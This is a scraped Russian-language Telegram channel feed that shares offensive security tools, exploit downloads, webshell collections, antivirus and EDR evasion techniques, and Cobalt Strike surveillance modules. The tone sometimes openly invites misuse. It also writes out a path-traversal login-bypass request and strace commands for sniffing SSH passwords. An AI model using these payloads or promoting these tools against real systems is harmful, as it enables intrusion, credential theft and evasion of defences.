2022-12-21 08:40:36
CloudmareПалим реальные IPадреса сайтов защищенных Cloudflare, Sucuri или Incapsula.Но таки да - работает только если криво настроен DNS.download
2022-12-21 08:14:02
Атаки на web-приложения на JAVAЭто обучающий проект, время от времени обновляется. Проект стремится поделиться технологиями, связанными с безопасностью Java, в краткой и ясной форме, упростить некоторые сложные технические вопросы и позволить изучить безопасность Java.download*Bonus trackJar AnalyzerGUI для анализа файлов JAR, особенно подходящий для анализа безопасности кода. download#java #security #web #hack
2022-12-20 11:20:07
Только ВАЖНЫЕ вопросы ! #hackers #xss
2022-12-19 11:24:38
linux injectorИнжектим в общие библиотеки x64 Linux. (без ptrace - а то на ptrace root права нужны, а права повышать в системе в падлу)usage:linux_injector <pid> <module>Да да, все так просто, иди уже.download
2022-12-19 11:17:54
powershell-obfuscationОбфускатор Powershell anti-kill, простой и эффективный, проходит все VT (когда трава была зеленее)download
2022-12-18 10:45:29
MacDirtyCowDemПолучаем root в macOS 13.0.1 через CVE-2022-46689exploit#root #macos #exploit
2022-12-17 14:55:29
Dirty Vanityновая техника внедрения, злоупотребляющая Windows fork API для обхода EDR.Слайды тутPOC тут#windows #bypass #edr
2022-12-16 13:39:36
Бэкдоры в FreePBXPHP бэкдор, который добавляет своего пользователя (mgknight), удаляет законных юзеров, кодируется в base64 и переписывает .htaccess - встречайте на ваших серваках телефонии)))Пятничное расследование читать#freepbx #backdoor
2022-12-16 09:42:00
CVE-2022-28672Foxit PDF Reader Remote Code Execution Exploit (NOT POC))))
2022-12-16 09:38:19
Super XrayWeb Vulnerability Scannerdownload#web #vuln #scanner
2022-12-16 09:30:54
Большая коллекция WEBSHELLSНа asp, aspx, php, jsp, pl, py, etcdownload#webshell
2022-12-16 06:32:14
CVE-2022-45451 Acronis POCdownload
2022-12-16 03:42:30
Privilege Escalation Vulnerabilities (UNIX Insecure File Handling) *1. UNIX Symlink Following and Insecure File Permissions in Detailed Lock Logging2. UNIX Symlink Following and Race Condition in Hardware Reporting 3. UNIX Symlink Following and Race Condition in System Log Feature of saposcol4. UNIX Symlink Following in Log File Creation of saposcol5. UNIX Symlink Following in Shared Memory Dump File Creation of saposcol#linux #privesc #sec
2022-12-16 03:11:03
DirCreate2SystemПолучаем NT AUTHORITY\\SYSTEM*Было обнаружено, что comctl32.dll (который отсутствует в системном каталоге, которого на самом деле не существует) можно загрузить через wermgr.exe (отчет об ошибках Windows при запуске schtasks). Это означает, что если мы можем создать папку с именем C:\\windows\\system32\\wermgr.exe.local с ACL с полным доступом, мы сможем захватить comctl32.dll в этих папках. Затем можно этот POC как метод создания каталога для оболочки NT AUTHORITY\\SYSTEM.*DOWNLOAD POC#windows #escpriv #POC #system
2022-12-16 03:00:35
Пятничная викторина )))#docker #vuln
2022-12-15 07:56:38
SIEMSIEM Tactics, Techiques, and Procedures read
2022-12-09 10:00:40
Перехват системных вызовов в Windows 11 22H2 like Avast Antivirus.Исследование, анализ и обход.Learn#windows #syscall #bypass
2022-12-09 09:50:48
DCOMPotatoКоллекция эксплойтов /повышения привилегий службы DCOM.*doownload#exploit #dcom
2022-12-09 06:44:51
Ну во первых с пятницей.А во вторых, Я тебя сука по IP вычислю*только для образовательных целей (нет)#track #ip #deanon
2022-12-08 19:56:26
в предложку кстати
2022-12-08 13:59:41
Defender Exclusions BOFХороший пример того, что defender отключать не обязательно, достаточно определить "исключения" ииии воспользоваться ими )))0_щ
2022-12-08 13:42:39
CVE-2022-2414Дырка в pki-coreуязвимость позволяет удаленному злоумышленнику получить содержимое произвольных файлов, отправив специально созданные HTTP-запросы.
2022-12-08 08:52:08
Получаем пароль от SSH в открытом виде*1. получаем точный идентификатор sshdpgrep -l sshd2. Отслеживаем системные вызовы strace -f -p <ssh_PID> -e trace=write -o capture#ssh #sniff #password
2022-12-08 08:14:33
CVE-2022-29596MicroStrategy Enterprise Manager 2022обходим аутентификацию, вызывая ошибку входа в систему, а затем вводя:Uid=/../../../../../../../../../../../windows/win.ini%00.jpg&Pwd=_any_password_&ConnMode=1&3054=Login#microsoft #bypass
2022-12-08 07:51:03
RCE via SSTI on Spring Boot Error Page with Akamai WAF Bypassread
2022-12-07 12:58:39
Burp Suite PRO version 2022.12.2
2022-12-07 06:30:34
PentagridSMS-шлюз с открытым исходным кодом для пентест проектовreadinstall and run#gsm #gateway #sms #2G/3G/4G/5G
2022-12-07 06:04:44
Random C2 Profile Generatorдля cobalt-strikedownload#cobalt
2022-12-07 05:33:30
PENTESTING BIBLE
2022-12-06 10:33:45
Linux PrivEscЗлой CRON для самых маленьких - тут#linux #cron #esc
2022-12-06 07:17:51
Bug Bounty Wordlistsdownload
2022-12-05 11:57:02
концепция удаления/записи произвольного файла в Sysmon (CVE-2022-41120/CVE-2022-XXXXX)download POC#windows #LPE #poc
2022-12-05 07:13:32
The Defender’s Guide to the Windows Registryread#widows #defender #registry
2022-12-04 17:44:16
Black Hat 2022 USA/ASIA/EuropeвидеоUSAASIAEUROPE
2022-12-02 14:24:38
Recon Methods*part 1 - OSINT Host Discoverypart 2 - OSINT Host Discovery Continuedpart 3 - OSINT Employee Discoverypart 4 - Automated OSINTpart 5 - Traffic on the Target#cybersec #recon
2022-12-01 20:21:12
WindowSpyЭто такой Cobalt Strike Beacon который "узконаправленно" следит за действиями пользователя (открытие определенных документов, вкладки браузера, vpn коннекты и тд).Такая движуха повышает скрытность и снижает обнаружение. Значит - маст хэв.download #cobaltstrike #module
2022-12-01 14:22:21
The Linux Kernel Module Programming GuideNovember 10, 2022read
2022-12-01 08:33:15
Microsoft Exchange ProxyNotShell RCEНе POC, а полноценный официальный exploit для metasploitdownload#rce #exploit #microsoft #metasploit
2022-12-01 08:18:50
RCE root-уязвимость в утилите ping, поставляемой во FreeBSDCVE-2022-23093read
2022-11-30 08:44:00
такое конечно, но актуальнее с каждым днем
2022-11-30 08:10:51
модуль Metasploit для удаленного управления для развертывания полезной нагрузки и запуска ее с сервераRemote Control Collection Remote Code Executiondownload#exploit #remote
2022-11-29 16:07:20
Vulnerability Feed#vuln #exploits
2022-11-29 10:27:50
regex GitHub Dorks /ssh:\/\/.*:.*@.*target\.com/ /ftp:\/\/.*:.*@.*target\.com/
2022-11-29 05:42:49
SpartacusDLL Hijacking Discovery ToolТот спартак вроде оскар получил)) #dll
2022-11-29 05:35:29
Рановато, но таки даТОП 10 из 20221. Follina (CVE-2022-30190)2. Log4Shell (CVE-2021-44228)3. Spring4Shell (CVE-2022-22965)4. F5 BIG-IP (CVE-2022-1388)5. Google Chrome zero-day (CVE-2022-0609)6. Old but not forgotten - Microsoft Office bug (CVE-2017-11882)7. ProxyNotShell (CVE-2022-41082, CVE-2022-41040)8. Zimbra Collaboration Suite bugs (CVE-2022-27925, CVE-2022-41352)9. Atlassian Confluence RCE flaw (CVE-2022-26134)10. Zyxel RCE vulnerability (CVE-2022-30525)
2022-11-25 07:18:33
Malware Analysis Seriespdf
2022-11-25 07:13:29
Ох лоооол)))0day fanslink
2022-11-22 19:23:00
MEGA 6500%в июне 2022 года я обнаружил уязвимость в системе облачного хранения MEGA, которая позволяла мне хранить больше данных, чем разрешено для бесплатных учетных записей. Мне удалось сохранить примерно 1300 ГБ данных в MEGA, несмотря на то, что ограничение на бесплатное хранилище для MEGA составляет 20 ГБ.Видела ман в сентябре, там был другой подход !Через яндекс фотки можно было попась в яндекс деньгиПочитать стори
2022-11-22 13:37:53
Для Red Team*Red Team Management by JoasAwesome Red Team by yeyintminthuhtutAwesome Red Team Operations by Joas
2022-11-22 12:57:04
CVE-2022-41924 RCE in Tailscale (vpn service)занятный research#vpn #rce #research
2022-11-22 07:49:05
wireguard-initramfs*Включает wireguard во время загрузки ядра до монтирования зашифрованных разделов. В сочетании с dropbear это может обеспечить ПОЛНОСТЬЮ ЗАШИФРОВАННУЮ удаленную загрузку без хранения ключевого материала.Вообще есть конечно способы проще, но мало ли кому пригодится.download#security #linux
2022-11-22 05:55:19
ViperSoftX: Hiding in System Logs and Spreading VenomSoftXна почитать
2022-11-22 04:53:34
просто положу тутcypherhound
2022-11-22 04:38:39
Прикольнопроверить, подвержены ли вы известной уязвимости в вашем оборудовании (ЦП) при использовании Linux, бонусом статус устранения:grep -r . /sys/devices/system/cpu/vulnerabilities/
2022-11-22 04:15:09
Active Directory Attack Cheat SheetRead#AD #attack
2022-11-18 09:41:21
Всем привет !!!Вчера у нас был день рождения, каналу исполнился один год.Год был не простой, многое изменилось, приходили и уходили люди, менялась концепция канала, выстраивалась модель поведения.***Много интересных людей постучалось в ЛС с интересными предложениями, (спасибо Вам большое), некоторые из них мы начнем реализовывать уже сегодня.***Начнем с общего ЧАТа для общения и обмена опытом ЧЯТ***Если Вам нравится то что мы делаем, Вы можете нас поддержатьBitcoin bc1qe8vmnxeqftjj7qynq8ljyv564j44wqaww8sa82Ethereum 0xa9626b33E39d904b6A48640cA89295323E7402A9Monero 43rmbgj7gy8fwAzuqWNNAbL3K3Eb54khZhY36gkRM8Vv6EVvEQFvSMBEhGyQDY43DWfEsbBY6msmR3GRGt4cC49yVs2jc8kС днем рождения proxy-bar !!!Иногда тут куется контент)))
2022-11-18 05:39:59
будь в курсеinvite to defcon.social
2022-11-18 05:31:06
ArtfuscatorЛучший подход к психологической войне против reverse-инженеров.Звучит конечно жирно,))downLoad
2022-11-18 05:16:20
Рабочий PoC для CVE-2022-41040 and CVE-2022-41082 (A.K.A ProxyNotShell)*python poc_aug3.py <host> <username> <password> <command>*download POC
2022-11-11 20:17:38
kernel r/w exploit for iOS 15 and macOS 12 *Эксплойт объединяет 4 уязвимости:CVE-2022-32845 : aned signature check bypass for model.hwx.CVE-2022-32948 : DeCxt::FileIndexToWeight() OOB Read due to lack of array index validation.CVE-2022-42805 : ZinComputeProgramUpdateMutables() potential arbitrary read due to Integer overflow issue.CVE-2022-32899 : DeCxt::RasterizeScaleBiasData() Buffer underflow due to integer overflow issue.Протестировано на:iPhone12 Pro (iPhone13,3) with iOS 15.5.iPad Pro (iPad8,10) with iPadOS 15.5.iPhone11 Pro (iPhone12,3) with iOS 15.4.1.MacBookAir10,1 M1 with macOS 12.4.
2022-11-11 15:45:40
Кто твой источник ?Сбор информации из dark-web и темных уголков clearNet в контексте разведки киберугроз.deepdarkCTI Откуда:* Telegram channels, groups and chats* Discord channels* ransomware gangs sites* forums related to cyber criminal activities and data leaks* markets* exploits databases* Twitter accounts* RaaS (Ransomware As A Service) sitesНекоторые могут найти себя 😎#osint #Cyber_Threat_Intelligence
2022-11-11 11:47:54
значит, случаи были
2022-11-10 20:55:27
Вот так оно все и начинается - отличный тред - "У меня есть друг, друг пишет руткиты, а недавно я купил новый ноут, ноут стал странно себя вести и друг хохочет"Теперь комьюнити разворачивает детективную серию по поиску черной кошки в темной комнате.А был ли мальчик ? и был ли rootkitПочитать на ночь removing-a-rootkit (комменты обязательно)#idiots #exFriend
2022-11-10 18:27:28
Backdooring Office Structures. Part 1: The Oldschool Backdooring Office Structures. Part 2: Payload Crumbs In Custom Parts #old